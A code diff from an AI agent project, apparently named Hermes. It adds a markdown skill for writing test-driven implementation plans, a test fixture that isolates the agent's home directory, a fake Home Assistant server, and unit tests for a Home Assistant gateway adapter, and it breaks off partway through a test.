+Write comprehensive implementation plans assuming the implementer has zero context for the codebase and questionable taste. Document everything they need: which files to touch, complete code, testing commands, docs to check, how to verify. Give them bite-sized tasks. DRY. YAGNI. TDD. Frequent commits.
+
+Assume the implementer is a skilled developer but knows almost nothing about the toolset or problem domain. Assume they don't know good test design very well.
+
+**Core principle:** A good plan makes implementation obvious. If someone has to guess, the plan is incomplete.
+
+## When to Use
+
+**Always use before:**
+- Implementing multi-step features
+- Breaking down complex requirements
+- Delegating to subagents via subagent-driven-development
+
+**Don't skip when:**
+- Feature seems simple (assumptions cause bugs)
+- You plan to implement it yourself (future you needs guidance)
+- Working alone (documentation matters)
+
+## Bite-Sized Task Granularity
+
+**Each task = 2-5 minutes of focused work.**
+
+Every step is one action:
+- "Write the failing test" — step
+- "Run it to make sure it fails" — step
+- "Implement the minimal code to make the test pass" — step
+- "Run the tests and make sure they pass" — step
+- "Commit" — step
+
+**Too big:**
+```markdown
+### Task 1: Build authentication system
+[50 lines of code across 5 files]
+```
+
+**Right size:**
+```markdown
+### Task 1: Create User model with email field
+[10 lines, 1 file]
+
+### Task 2: Add password hash field to User
+[8 lines, 1 file]
+
+### Task 3: Create password hashing utility
+[15 lines, 1 file]
+```
+
+## Plan Document Structure
+
+### Header (Required)
+
+Every plan MUST start with:
+
+```markdown
+# [Feature Name] Implementation Plan
+
+> **For Hermes:** Use subagent-driven-development skill to implement this plan task-by-task.
+
+**Goal:** [One sentence describing what this builds]
+
+**Architecture:** [2-3 sentences about approach]
+
+**Tech Stack:** [Key technologies/libraries]
+
+---
+```
+
+### Task Structure
+
+Each task follows this format:
+
+````markdown
+### Task N: [Descriptive Name]
+
+**Objective:** What this task accomplishes (one sentence)
+
+**Files:**
+- Create: `exact/path/to/new_file.py`
+- Modify: `exact/path/to/existing.py:45-67` (line numbers if known)
+- Test: `tests/path/to/test_file.py`
+
+**Step 1: Write failing test**
+
+```python
+def test_specific_behavior():
+    result = function(input)
+    assert result == expected
+```
+
+**Step 2: Run test to verify failure**
+
+Run: `pytest tests/path/test.py::test_specific_behavior -v`
+Expected: FAIL — "function not defined"
+
+**Step 3: Write minimal implementation**
+
+```python
+def function(input):
+    return expected
+```
+
+**Step 4: Run test to verify pass**
+
+Run: `pytest tests/path/test.py::test_specific_behavior -v`
+Expected: PASS
+
+**Step 5: Commit**
+
+```bash
+git add tests/path/test.py src/path/file.py
+git commit -m "feat: add specific feature"
+```
+````
+
+## Writing Process
+
+### Step 1: Understand Requirements
+
+Read and understand:
+- Feature requirements
+- Design documents or user description
+- Acceptance criteria
+- Constraints
+
+### Step 2: Explore the Codebase
+
+Use Hermes tools to understand the project:
+
+```python
+# Understand project structure
+search_files("*.py", target="files", path="src/")
+
+# Look at similar features
+search_files("similar_pattern", path="src/", file_glob="*.py")
+
+# Check existing tests
+search_files("*.py", target="files", path="tests/")
+
+# Read key files
+read_file("src/app.py")
+```
+
+### Step 3: Design Approach
+
+Decide:
+- Architecture pattern
+- File organization
+- Dependencies needed
+- Testing strategy
+
+### Step 4: Write Tasks
+
+Create tasks in order:
+1. Setup/infrastructure
+2. Core functionality (TDD for each)
+3. Edge cases
+4. Integration
+5. Cleanup/documentation
+
+### Step 5: Add Complete Details
+
+For each task, include:
+- **Exact file paths** (not "the config file" but `src/config/settings.py`)
+- **Complete code examples** (not "add validation" but the actual code)
+- **Exact commands** with expected output
+- **Verification steps** that prove the task works
+
+### Step 6: Review the Plan
+
+Check:
+- [ ] Tasks are sequential and logical
+- [ ] Each task is bite-sized (2-5 min)
+- [ ] File paths are exact
+- [ ] Code examples are complete (copy-pasteable)
+- [ ] Commands are exact with expected output
+- [ ] No missing context
+- [ ] DRY, YAGNI, TDD principles applied
+
+### Step 7: Save the Plan
+
+```bash
+mkdir -p docs/plans
+# Save plan to docs/plans/YYYY-MM-DD-feature-name.md
+git add docs/plans/
+git commit -m "docs: add implementation plan for [feature]"
+```
+
+## Principles
+
+### DRY (Don't Repeat Yourself)
+
+**Bad:** Copy-paste validation in 3 places
+**Good:** Extract validation function, use everywhere
+
+### YAGNI (You Aren't Gonna Need It)
+
+**Bad:** Add "flexibility" for future requirements
+**Good:** Implement only what's needed now
+
+```python
+# Bad — YAGNI violation
+class User:
+    def __init__(self, name, email):
+        self.name = name
+        self.email = email
+        self.preferences = {}  # Not needed yet!
+        self.metadata = {}     # Not needed yet!
+
+# Good — YAGNI
+class User:
+    def __init__(self, name, email):
+        self.name = name
+        self.email = email
+```
+
+### TDD (Test-Driven Development)
+
+Every task that produces code should include the full TDD cycle:
+1. Write failing test
+2. Run to verify failure
+3. Write minimal code
+4. Run to verify pass
+
+See `test-driven-development` skill for details.
+
+### Frequent Commits
+
+Commit after every task:
+```bash
+git add [files]
+git commit -m "type: description"
+```
+
+## Common Mistakes
+
+### Vague Tasks
+
+**Bad:** "Add authentication"
+**Good:** "Create User model with email and password_hash fields"
+
+### Incomplete Code
+
+**Bad:** "Step 1: Add validation function"
+**Good:** "Step 1: Add validation function" followed by the complete function code
+
+### Missing Verification
+
+**Bad:** "Step 3: Test it works"
+**Good:** "Step 3: Run `pytest tests/test_auth.py -v`, expected: 3 passed"
+
+### Missing File Paths
+
+**Bad:** "Create the model file"
+**Good:** "Create: `src/models/user.py`"
+
+## Execution Handoff
+
+After saving the plan, offer the execution approach:
+
+**"Plan complete and saved. Ready to execute using subagent-driven-development — I'll dispatch a fresh subagent per task with two-stage review (spec compliance then code quality). Shall I proceed?"**
+
+When executing, use the `subagent-driven-development` skill:
+- Fresh `delegate_task` per task with full context
+- Spec compliance review after each task
+- Code quality review after spec passes
+- Proceed only when both reviews approve
+
+## Remember
+
+```
+Bite-sized tasks (2-5 min each)
+Exact file paths
+Complete code (copy-pasteable)
+Exact commands with expected output
+Verification steps
+DRY, YAGNI, TDD
+Frequent commits
+```
+
+**A good plan makes implementation obvious.**
--- a/tests/conftest.py
+++ b/tests/conftest.py
@@ -14,6 +14,18 @@ if str(PROJECT_ROOT) not in sys.path:
    sys.path.insert(0, str(PROJECT_ROOT))


+@pytest.fixture(autouse=True)
+def _isolate_hermes_home(tmp_path, monkeypatch):
+    """Redirect HERMES_HOME to a temp dir so tests never write to ~/.hermes/."""
+    fake_home = tmp_path / "hermes_test"
+    fake_home.mkdir()
+    (fake_home / "sessions").mkdir()
+    (fake_home / "cron").mkdir()
+    (fake_home / "memories").mkdir()
+    (fake_home / "skills").mkdir()
+    monkeypatch.setenv("HERMES_HOME", str(fake_home))
+
+
@pytest.fixture()
 def tmp_dir(tmp_path):
    """Provide a temporary directory that is cleaned up automatically."""
--- a/tests/fakes/init.py
+++ b/tests/fakes/init.py
--- a/tests/fakes/fake_ha_server.py
+++ b/tests/fakes/fake_ha_server.py
@@ -0,0 +1,288 @@
+"""Fake Home Assistant server for integration testing.
+
+Provides a real HTTP + WebSocket server (via aiohttp.web) that mimics the
+Home Assistant API surface used by hermes-agent:
+
+- ``/api/websocket``  -- WebSocket auth handshake + event push
+- ``/api/states``     -- GET all entity states
+- ``/api/states/{entity_id}`` -- GET single entity state
+- ``/api/services/{domain}/{service}`` -- POST service call
+- ``/api/services/persistent_notification/create`` -- POST notification
+
+Usage::
+
+    async with FakeHAServer(token="test-token") as server:
+        url = server.url            # e.g. "http://127.0.0.1:54321"
+        await server.push_event(event_data)
+        assert server.received_notifications  # verify what arrived
+"""
+
+import asyncio
+import json
+from typing import Any, Dict, List, Optional
+
+import aiohttp
+from aiohttp import web
+from aiohttp.test_utils import TestServer
+
+
+# -- Sample entity data -------------------------------------------------------
+
+ENTITY_STATES: List[Dict[str, Any]] = [
+    {
+        "entity_id": "light.bedroom",
+        "state": "on",
+        "attributes": {"friendly_name": "Bedroom Light", "brightness": 200},
+        "last_changed": "2025-01-15T10:30:00+00:00",
+        "last_updated": "2025-01-15T10:30:00+00:00",
+    },
+    {
+        "entity_id": "light.kitchen",
+        "state": "off",
+        "attributes": {"friendly_name": "Kitchen Light"},
+        "last_changed": "2025-01-15T09:00:00+00:00",
+        "last_updated": "2025-01-15T09:00:00+00:00",
+    },
+    {
+        "entity_id": "sensor.temperature",
+        "state": "22.5",
+        "attributes": {
+            "friendly_name": "Kitchen Temperature",
+            "unit_of_measurement": "C",
+        },
+        "last_changed": "2025-01-15T10:00:00+00:00",
+        "last_updated": "2025-01-15T10:00:00+00:00",
+    },
+    {
+        "entity_id": "switch.fan",
+        "state": "on",
+        "attributes": {"friendly_name": "Living Room Fan"},
+        "last_changed": "2025-01-15T08:00:00+00:00",
+        "last_updated": "2025-01-15T08:00:00+00:00",
+    },
+    {
+        "entity_id": "climate.thermostat",
+        "state": "heat",
+        "attributes": {
+            "friendly_name": "Main Thermostat",
+            "current_temperature": 21,
+            "temperature": 23,
+        },
+        "last_changed": "2025-01-15T07:00:00+00:00",
+        "last_updated": "2025-01-15T07:00:00+00:00",
+    },
+]
+
+
+class FakeHAServer:
+    """In-process fake Home Assistant for integration tests.
+
+    Parameters
+    ----------
+    token : str
+        The expected Bearer token for authentication.
+    """
+
+    def __init__(self, token: str = "test-token-123"):
+        self.token = token
+
+        # Observability -- tests inspect these after exercising the adapter.
+        self.received_service_calls: List[Dict[str, Any]] = []
+        self.received_notifications: List[Dict[str, Any]] = []
+
+        # Control -- tests push events, server forwards them over WS.
+        self._event_queue: asyncio.Queue[Dict[str, Any]] = asyncio.Queue()
+
+        # Flag to simulate auth rejection.
+        self.reject_auth = False
+
+        # Flag to simulate server errors.
+        self.force_500 = False
+
+        # Internal bookkeeping.
+        self._app: Optional[web.Application] = None
+        self._server: Optional[TestServer] = None
+        self._ws_connections: List[web.WebSocketResponse] = []
+
+    # -- Public helpers --------------------------------------------------------
+
+    @property
+    def url(self) -> str:
+        """Base URL of the running server, e.g. ``http://127.0.0.1:12345``."""
+        assert self._server is not None, "Server not started"
+        host = self._server.host
+        port = self._server.port
+        return f"http://{host}:{port}"
+
+    async def push_event(self, event_data: Dict[str, Any]) -> None:
+        """Enqueue a state_changed event for delivery over WebSocket."""
+        await self._event_queue.put(event_data)
+
+    # -- Lifecycle -------------------------------------------------------------
+
+    async def start(self) -> None:
+        self._app = self._build_app()
+        self._server = TestServer(self._app)
+        await self._server.start_server()
+
+    async def stop(self) -> None:
+        # Close any remaining WS connections.
+        for ws in self._ws_connections:
+            if not ws.closed:
+                await ws.close()
+        self._ws_connections.clear()
+        if self._server is not None:
+            await self._server.close()
+
+    async def __aenter__(self) -> "FakeHAServer":
+        await self.start()
+        return self
+
+    async def __aexit__(self, *exc) -> None:
+        await self.stop()
+
+    # -- Application construction ----------------------------------------------
+
+    def _build_app(self) -> web.Application:
+        app = web.Application()
+        app.router.add_get("/api/websocket", self._handle_ws)
+        app.router.add_get("/api/states", self._handle_get_states)
+        app.router.add_get("/api/states/{entity_id}", self._handle_get_state)
+        # Notification endpoint must be registered before the generic service
+        # route so that it takes priority.
+        app.router.add_post(
+            "/api/services/persistent_notification/create",
+            self._handle_notification,
+        )
+        app.router.add_post(
+            "/api/services/{domain}/{service}",
+            self._handle_call_service,
+        )
+        return app
+
+    # -- Auth helper -----------------------------------------------------------
+
+    def _check_rest_auth(self, request: web.Request) -> Optional[web.Response]:
+        """Return a 401 response if the Bearer token is wrong, else None."""
+        auth = request.headers.get("Authorization", "")
+        if auth != f"Bearer {self.token}":
+            return web.Response(status=401, text="Unauthorized")
+        if self.force_500:
+            return web.Response(status=500, text="Internal Server Error")
+        return None
+
+    # -- WebSocket handler -----------------------------------------------------
+
+    async def _handle_ws(self, request: web.Request) -> web.WebSocketResponse:
+        ws = web.WebSocketResponse()
+        await ws.prepare(request)
+        self._ws_connections.append(ws)
+
+        # Step 1: auth_required
+        await ws.send_json({"type": "auth_required", "ha_version": "2025.1.0"})
+
+        # Step 2: receive auth
+        msg = await ws.receive()
+        if msg.type != aiohttp.WSMsgType.TEXT:
+            await ws.close()
+            return ws
+        auth_msg = json.loads(msg.data)
+
+        # Step 3: validate
+        if self.reject_auth or auth_msg.get("access_token") != self.token:
+            await ws.send_json({"type": "auth_invalid", "message": "Invalid token"})
+            await ws.close()
+            return ws
+
+        await ws.send_json({"type": "auth_ok", "ha_version": "2025.1.0"})
+
+        # Step 4: subscribe_events
+        msg = await ws.receive()
+        if msg.type != aiohttp.WSMsgType.TEXT:
+            await ws.close()
+            return ws
+        sub_msg = json.loads(msg.data)
+        sub_id = sub_msg.get("id", 1)
+
+        # Step 5: ACK
+        await ws.send_json({
+            "id": sub_id,
+            "type": "result",
+            "success": True,
+            "result": None,
+        })
+
+        # Step 6: push events from queue until closed
+        try:
+            while not ws.closed:
+                try:
+                    event_data = await asyncio.wait_for(
+                        self._event_queue.get(), timeout=0.1,
+                    )
+                    await ws.send_json({
+                        "id": sub_id,
+                        "type": "event",
+                        "event": event_data,
+                    })
+                except asyncio.TimeoutError:
+                    continue
+        except (ConnectionResetError, asyncio.CancelledError):
+            pass
+
+        return ws
+
+    # -- REST handlers ---------------------------------------------------------
+
+    async def _handle_get_states(self, request: web.Request) -> web.Response:
+        err = self._check_rest_auth(request)
+        if err:
+            return err
+        return web.json_response(ENTITY_STATES)
+
+    async def _handle_get_state(self, request: web.Request) -> web.Response:
+        err = self._check_rest_auth(request)
+        if err:
+            return err
+        entity_id = request.match_info["entity_id"]
+        for s in ENTITY_STATES:
+            if s["entity_id"] == entity_id:
+                return web.json_response(s)
+        return web.Response(status=404, text=f"Entity {entity_id} not found")
+
+    async def _handle_notification(self, request: web.Request) -> web.Response:
+        err = self._check_rest_auth(request)
+        if err:
+            return err
+        body = await request.json()
+        self.received_notifications.append(body)
+        return web.json_response([])
+
+    async def _handle_call_service(self, request: web.Request) -> web.Response:
+        err = self._check_rest_auth(request)
+        if err:
+            return err
+        domain = request.match_info["domain"]
+        service = request.match_info["service"]
+        body = await request.json()
+
+        self.received_service_calls.append({
+            "domain": domain,
+            "service": service,
+            "data": body,
+        })
+
+        # Return affected entities (mimics real HA behaviour for light/switch).
+        affected = []
+        entity_id = body.get("entity_id")
+        if entity_id:
+            new_state = "on" if service == "turn_on" else "off"
+            for s in ENTITY_STATES:
+                if s["entity_id"] == entity_id:
+                    affected.append({
+                        "entity_id": entity_id,
+                        "state": new_state,
+                        "attributes": s.get("attributes", {}),
+                    })
+                    break
+
+        return web.json_response(affected)
--- a/tests/gateway/test_homeassistant.py
+++ b/tests/gateway/test_homeassistant.py
@@ -0,0 +1,604 @@
+"""Tests for the Home Assistant gateway adapter.
+
+Tests real logic: state change formatting, event filtering pipeline,
+cooldown behavior, config integration, and adapter initialization.
+"""
+
+import time
+from unittest.mock import AsyncMock, MagicMock, patch
+
+import pytest
+
+from gateway.config import (
+    GatewayConfig,
+    Platform,
+    PlatformConfig,
+)
+from gateway.platforms.homeassistant import (
+    HomeAssistantAdapter,
+    check_ha_requirements,
+)
+
+
+# ---------------------------------------------------------------------------
+# check_ha_requirements
+# ---------------------------------------------------------------------------
+
+
+class TestCheckRequirements:
+    def test_returns_false_without_token(self, monkeypatch):
+        monkeypatch.delenv("HASS_TOKEN", raising=False)
+        assert check_ha_requirements() is False
+
+    def test_returns_true_with_token(self, monkeypatch):
+        monkeypatch.setenv("HASS_TOKEN", "test-token")
+        assert check_ha_requirements() is True
+
+    @patch("gateway.platforms.homeassistant.AIOHTTP_AVAILABLE", False)
+    def test_returns_false_without_aiohttp(self, monkeypatch):
+        monkeypatch.setenv("HASS_TOKEN", "test-token")
+        assert check_ha_requirements() is False
+
+
+# ---------------------------------------------------------------------------
+# _format_state_change - pure function, all domain branches
+# ---------------------------------------------------------------------------
+
+
+class TestFormatStateChange:
+    @staticmethod
+    def fmt(entity_id, old_state, new_state):
+        return HomeAssistantAdapter._format_state_change(entity_id, old_state, new_state)
+
+    def test_climate_includes_temperatures(self):
+        msg = self.fmt(
+            "climate.thermostat",
+            {"state": "off"},
+            {"state": "heat", "attributes": {
+                "friendly_name": "Main Thermostat",
+                "current_temperature": 21.5,
+                "temperature": 23,
+            }},
+        )
+        assert "Main Thermostat" in msg
+        assert "'off'" in msg and "'heat'" in msg
+        assert "21.5" in msg and "23" in msg
+
+    def test_sensor_includes_unit(self):
+        msg = self.fmt(
+            "sensor.temperature",
+            {"state": "22.5"},
+            {"state": "25.1", "attributes": {
+                "friendly_name": "Living Room Temp",
+                "unit_of_measurement": "C",
+            }},
+        )
+        assert "22.5C" in msg and "25.1C" in msg
+        assert "Living Room Temp" in msg
+
+    def test_sensor_without_unit(self):
+        msg = self.fmt(
+            "sensor.count",
+            {"state": "5"},
+            {"state": "10", "attributes": {"friendly_name": "Counter"}},
+        )
+        assert "5" in msg and "10" in msg
+
+    def test_binary_sensor_on(self):
+        msg = self.fmt(
+            "binary_sensor.motion",
+            {"state": "off"},
+            {"state": "on", "attributes": {"friendly_name": "Hallway Motion"}},
+        )
+        assert "triggered" in msg
+        assert "Hallway Motion" in msg
+
+    def test_binary_sensor_off(self):
+        msg = self.fmt(
+            "binary_sensor.door",
+            {"state": "on"},
+            {"state": "off", "attributes": {"friendly_name": "Front Door"}},
+        )
+        assert "cleared" in msg
+
+    def test_light_turned_on(self):
+        msg = self.fmt(
+            "light.bedroom",
+            {"state": "off"},
+            {"state": "on", "attributes": {"friendly_name": "Bedroom Light"}},
+        )
+        assert "turned on" in msg
+
+    def test_switch_turned_off(self):
+        msg = self.fmt(
+            "switch.heater",
+            {"state": "on"},
+            {"state": "off", "attributes": {"friendly_name": "Heater"}},
+        )
+        assert "turned off" in msg
+
+    def test_fan_domain_uses_light_switch_branch(self):
+        msg = self.fmt(
+            "fan.ceiling",
+            {"state": "off"},
+            {"state": "on", "attributes": {"friendly_name": "Ceiling Fan"}},
+        )
+        assert "turned on" in msg
+
+    def test_alarm_panel(self):
+        msg = self.fmt(
+            "alarm_control_panel.home",
+            {"state": "disarmed"},
+            {"state": "armed_away", "attributes": {"friendly_name": "Home Alarm"}},
+        )
+        assert "Home Alarm" in msg
+        assert "armed_away" in msg and "disarmed" in msg
+
+    def test_generic_domain_includes_entity_id(self):
+        msg = self.fmt(
+            "automation.morning",
+            {"state": "off"},
+            {"state": "on", "attributes": {"friendly_name": "Morning Routine"}},
+        )
+        assert "automation.morning" in msg
+        assert "Morning Routine" in msg
+
+    def test_same_state_returns_none(self):
+        assert self.fmt(
+            "sensor.temp",
+            {"state": "22"},
+            {"state": "22", "attributes": {"friendly_name": "Temp"}},
+        ) is None
+
+    def test_empty_new_state_returns_none(self):
+        assert self.fmt("light.x", {"state": "on"}, {}) is None
+
+    def test_no_old_state_uses_unknown(self):
+        msg = self.fmt(
+            "light.new",
+            None,
+            {"state": "on", "attributes": {"friendly_name": "New Light"}},
+        )
+        assert msg is not None
+        assert "New Light" in msg
+
+    def test_uses_entity_id_when_no_friendly_name(self):
+        msg = self.fmt(
+            "sensor.unnamed",
+            {"state": "1"},
+            {"state": "2", "attributes": {}},
+        )
+        assert "sensor.unnamed" in msg
+
+
+# ---------------------------------------------------------------------------
+# Adapter initialization from config
+# ---------------------------------------------------------------------------
+
+
+class TestAdapterInit:
+    def test_url_and_token_from_config_extra(self, monkeypatch):
+        monkeypatch.delenv("HASS_URL", raising=False)
+        monkeypatch.delenv("HASS_TOKEN", raising=False)
+
+        config = PlatformConfig(
+            enabled=True,
+            token="config-token",
+            extra={"url": "http://192.168.1.50:8123"},
+        )
+        adapter = HomeAssistantAdapter(config)
+        assert adapter._hass_token == "config-token"
+        assert adapter._hass_url == "http://192.168.1.50:8123"
+
+    def test_url_fallback_to_env(self, monkeypatch):
+        monkeypatch.setenv("HASS_URL", "http://env-host:8123")
+        monkeypatch.setenv("HASS_TOKEN", "env-tok")
+
+        config = PlatformConfig(enabled=True, token="env-tok")
+        adapter = HomeAssistantAdapter(config)
+        assert adapter._hass_url == "http://env-host:8123"
+
+    def test_trailing_slash_stripped(self):
+        config = PlatformConfig(
+            enabled=True, token="t",
+            extra={"url": "http://ha.local:8123/"},
+        )
+        adapter = HomeAssistantAdapter(config)
+        assert adapter._hass_url == "http://ha.local:8123"
+
+    def test_watch_filters_parsed(self):
+        config = PlatformConfig(
+            enabled=True, token="t",
+            extra={
+                "watch_domains": ["climate", "binary_sensor"],
+                "watch_entities": ["sensor.special"],
+                "ignore_entities": ["sensor.uptime", "sensor.cpu"],
+                "cooldown_seconds": 120,
+            },
+        )
+        adapter = HomeAssistantAdapter(config)
+        assert adapter._watch_domains == {"climate", "binary_sensor"}
+        assert adapter._watch_entities == {"sensor.special"}
+        assert adapter._ignore_entities == {"sensor.uptime", "sensor.cpu"}
+        assert adapter._cooldown_seconds == 120
+
+    def test_defaults_when_no_extra(self, monkeypatch):
+        monkeypatch.setenv("HASS_TOKEN", "tok")
+        config = PlatformConfig(enabled=True, token="tok")
+        adapter = HomeAssistantAdapter(config)
+        assert adapter._watch_domains == set()
+        assert adapter._watch_entities == set()
+        assert adapter._ignore_entities == set()
+        assert adapter._cooldown_seconds == 30
+
+
+# ---------------------------------------------------------------------------
+# Event filtering pipeline (_handle_ha_event)
+#
+# We mock handle_message (not our code, it's the base class pipeline) to
+# capture the MessageEvent that _handle_ha_event produces.
+# ---------------------------------------------------------------------------
+
+
+def _make_adapter(**extra) -> HomeAssistantAdapter:
+    config = PlatformConfig(enabled=True, token="tok", extra=extra)
+    adapter = HomeAssistantAdapter(config)
+    adapter.handle_message = AsyncMock()
+    return adapter
+
+
+def _make_event(entity_id, old_state, new_state, old_attrs=None, new_attrs=None):
+    return {
+        "data": {
+            "entity_id": entity_id,
+            "old_state": {"state": old_state, "attributes": old_attrs or {}},
+            "new_state": {"state": new_state, "attributes": new_attrs or {"friendly_name": entity_id}},
+        }
+    }
+
+
+class TestEventFilteringPipeline:
+    @pytest.mark.asyncio
+    async def test_ignored_entity_not_forwarded(self):
+        adapter = _make_adapter(ignore_entities=["sensor.uptime"])
+        await adapter._handle_ha_event(_make_event("sensor.uptime", "100", "101"))
+        adapter.handle_message.assert_not_called()
+
+    @pytest.mark.asyncio
+    async def test_unwatched_domain_not_forwarded(self):
+        adapter = _make_adapter(watch_domains=["climate"])
+        await adapter._handle_ha_event(_make_event("light.bedroom", "off", "on"))
+        adapter.handle_message.assert_not_called()
+
+    @pytest.mark.asyncio
+    async def test_watched_domain_forwarded(self):
+        adapter = _make_adapter(watch_domains=["climate"], cooldown_seconds=0)
+        await adapter._handle_ha_event(
+            _make_event("climate.thermostat", "off", "heat",
+                        new_attrs={"friendly_name": "Thermostat", "current_temperature": 20, "temperature": 22})
+        )
+        adapter.handle_message.assert_called_once()
+
+        # Verify the actual MessageEvent text content
+        msg_event = adapter.handle_message.call_args[0][0]
+        assert "Thermostat" in msg_event.text
+        assert "heat" in msg_event.text
+        assert msg_event.source.platform == Platform.HOMEASSISTANT
+        assert msg_event.source.chat_id == "ha_events"
+
+    @pytest.mark.asyncio
+    async def test_watched_entity_forwarded(self):
+        adapter = _make_adapter(watch_entities=["sensor.important"], cooldown_seconds=0)
+        await adapter._handle_ha_event(
+            _make_event("sensor.important", "10", "20",
+                        new_attrs={"friendly_name": "Important Sensor", "unit_of_measurement": "W"})
+        )
+        adapter.handle_message.assert_called_once()
+        msg_event = adapter.handle_message.call_args[0][0]
+        assert "10W" in msg_event.text and "20W" in msg_event.text
+
+    @pytest.mark.asyncio
+    async def test_no_filters_passes_everything(self):
+        adapter = _make_adapter(cooldown_seconds=0)
+        await adapter._handle_ha_event(_make_event("cover.blinds", "closed", "open"))
+        adapter.handle_message.assert_called_once()
+
+    @pytest.mark.asyncio
+    async def test_same_state_not_forwarded(self):
+        adapter = _make_adapter(cooldown_seconds=0)
+        await adapter._handle_ha_event(_make_event("light.x", "on", "on"))
+        adapter.handle_message.assert_not_called()
+
+    @pytest.mark.asyncio
+    async def test_empty_entity_id_skipped(self):
+        adapter = _make_adapter()
+        await adapter._handle_ha_event({"data": {"entity_id": ""}})
+        adapter.handle_message.assert_not_called()
+
+    @pytest.mark.asyncio
+    async def test_message_event_has_correct_source(self):
+        adapter = _make_adapter(cooldown_seconds=0)
+        await adapter._handle_ha_event(
+            _make_event("light.test", "off", "on",
+                        new_attrs={"friendly_name": "Test Light"})
+        )
+        msg_event = adapter.handle_message.call_args[0][0]
+        assert msg_event.source.user_name == "Home Assistant"
+        assert msg_event.source.chat_type == "channel"
+        assert msg_event.message_id.startswith("ha_light.test_")
+
+
+# ---------------------------------------------------------------------------
+# Cooldown behavior
+# ---------------------------------------------------------------------------
+
+
+class TestCooldown:
+    @pytest.mark.asyncio
+    async def test_cooldown_blocks_rapid_events(self):
+        adapter = _make_adapter(cooldown_seconds=60)
+
+        event = _make_event("sensor.temp", "20", "21",
+                            new_attrs={"friendly_name": "Temp"})
+        await adapter._handle_ha_event(event)
+        assert adapter.handle_message.call_count == 1
+
+        # Second event immediately after should be blocked
+        event2 = _make_event("sensor.temp", "21", "22",
+                             new_attrs={"friendly_name": "Temp"})
+        await adapter._handle_ha_event(event2)
+        assert adapter.handle_message.call_count == 1  # Still 1
+
+    @pytest.mark.asyncio
+    async def test_cooldown_expires(self):
+        adapter = _make_adapter(cooldown_seconds=1)
+
+        event = _make_event("sensor.temp", "20", "21",
+                            new_attrs={"friendly_name": "Temp"})
+        await adapter._handle_ha_event(event)
+        assert adapter.handle_message.call_count == 1
+
+        # Simulate time passing beyond cooldown
+        adapter._last_event_time["sensor.temp"] = time.time() - 2
+
+        event2 = _make_event("sensor.temp", "21", "22",
+                             new_attrs={"friendly_name": "Temp"})
+        await adapter._handle_ha_event(event2)
+        assert adapter.handle_message.call_count == 2
+
+    @pytest.mark.asyncio
+    async def test_different_entities_independent_cooldowns(self):
+        adapter = _make_adapter(cooldown_seconds=60)
+
+        await adapter._handle_ha_event(
+            _make_event("sensor.a", "1", "2", new_attrs={"friendly_name": "A"})
+        )
+        await adapter._handle_ha_event(
+            _make_event("sensor.b", "3", "4", new_attrs={"friendly_name": "B"})
+        )
+        # Both should pass - different entities
+        assert adapter.handle_message.call_count == 2
+
+        # Same entity again - should be blocked
+        await adapter._handle_ha_event(
+            _make_event("sensor.a", "2", "3", new_attrs={"friendly_name": "A"})
+        )
+        assert adapter.handle_message.call_count == 2  # Still 2
+
+    @pytest.mark.asyncio
+    async def test_zero_cooldown_passes_all(self):
+        adapter = _make_adapter(cooldown_seconds=0)
+
+        for i in range(5):
+            await adapter._handle_ha_event(
+                _make_event("sensor.temp", str(i), str(i + 1),
+                            new_attrs={"friendly_name": "Temp"})
+            )
+        assert adapter.handle_message.call_count == 5
+
+
+# ---------------------------------------------------------------------------
+# Config integration (env overrides, round-trip)
+# ---------------------------------------------------------------------------
+
+
+class TestConfigIntegration:
+    def test_env_override_creates_ha_platform(self, monkeypatch):
+        monkeypatch.setenv("HASS_TOKEN", "env-token")
+        monkeypatch.setenv("HASS_URL", "http://10.0.0.5:8123")
+        # Clear other platform tokens
+        for v in ["TELEGRAM_BOT_TOKEN", "DISCORD_BOT_TOKEN", "SLACK_BOT_TOKEN"]:
+            monkeypatch.delenv(v, raising=False)
+
+        from gateway.config import load_gateway_config
+        config = load_gateway_config()
+
+        assert Platform.HOMEASSISTANT in config.platforms
+        ha = config.platforms[Platform.HOMEASSISTANT]
+        assert ha.enabled is True
+        assert ha.token == "env-token"
+        assert ha.extra["url"] == "http://10.0.0.5:8123"
+
+    def test_no_env_no_platform(self, monkeypatch):
+        for v in ["HASS_TOKEN", "HASS_URL", "TELEGRAM_BOT_TOKEN",
+                   "DISCORD_BOT_TOKEN", "SLACK_BOT_TOKEN"]:
+            monkeypatch.delenv(v, raising=False)
+
+        from gateway.config import load_gateway_config
+        config = load_gateway_config()
+        assert Platform.HOMEASSISTANT not in config.platforms
+
+    def test_config_roundtrip_preserves_extra(self):
+        config = GatewayConfig(
+            platforms={
+                Platform.HOMEASSISTANT: PlatformConfig(
+                    enabled=True,
+                    token="tok",
+                    extra={
+                        "url": "http://ha:8123",
+                        "watch_domains": ["climate"],
+                        "cooldown_seconds": 45,
+                    },
+                ),
+            },
+        )
+        d = config.to_dict()
+        restored = GatewayConfig.from_dict(d)
+
+        ha = restored.platforms[Platform.HOMEASSISTANT]
+        assert ha.enabled is True
+        assert ha.token == "tok"
+        assert ha.extra["watch_domains"] == ["climate"]
+        assert ha.extra["cooldown_seconds"] == 45
+
+    def test_connected_platforms_includes_ha(self):
+        config = GatewayConfig(
+            platforms={
+                Platform.HOMEASSISTANT: PlatformConfig(enabled=True, token="tok"),
+                Platform.TELEGRAM: PlatformConfig(enabled=False, token="t"),
+            },
+        )
+        connected = config.get_connected_platforms()
+        assert Platform.HOMEASSISTANT in connected
+        assert Platform.TELEGRAM not in connected
+
+
+# ---------------------------------------------------------------------------
+# send() via REST API
+# ---------------------------------------------------------------------------
+
+
+class TestSendViaRestApi:
+    """send() uses REST API (not WebSocket) to avoid race conditions."""
+
+    @staticmethod
+    def _mock_aiohttp_session(response_status=200, response_text="OK"):
+        """Build a mock aiohttp session + response for async-with patterns.
+
+        aiohttp.ClientSession() is a sync constructor whose return value
+        is used as ``async with session:``.  ``session.post(...)`` returns a
+        context-manager (not a coroutine), so both layers use MagicMock for
+        the call and AsyncMock only for ``__aenter__`` / ``__aexit__``.
+        """
+        mock_response = MagicMock()
+        mock_response.status = response_status
+        mock_response.text = AsyncMock(return_value=response_text)
+        mock_response.__aenter__ = AsyncMock(return_value=mock_response)
+        mock_response.__aexit__ = AsyncMock(return_value=False)
+
+        mock_session = MagicMock()
+        mock_session.post = MagicMock(return_value=mock_response)
+        mock_session.__aenter__ = AsyncMock(return_value=mock_session)
+        mock_session.__aexit__ = AsyncMock(return_value=False)
+
+        return mock_session
+
+    @pytest.mark.asyncio
+    async def test_send_success(self):
+        adapter = _make_adapter()
+        mock_session = self._mock_aiohttp_session(200)
+
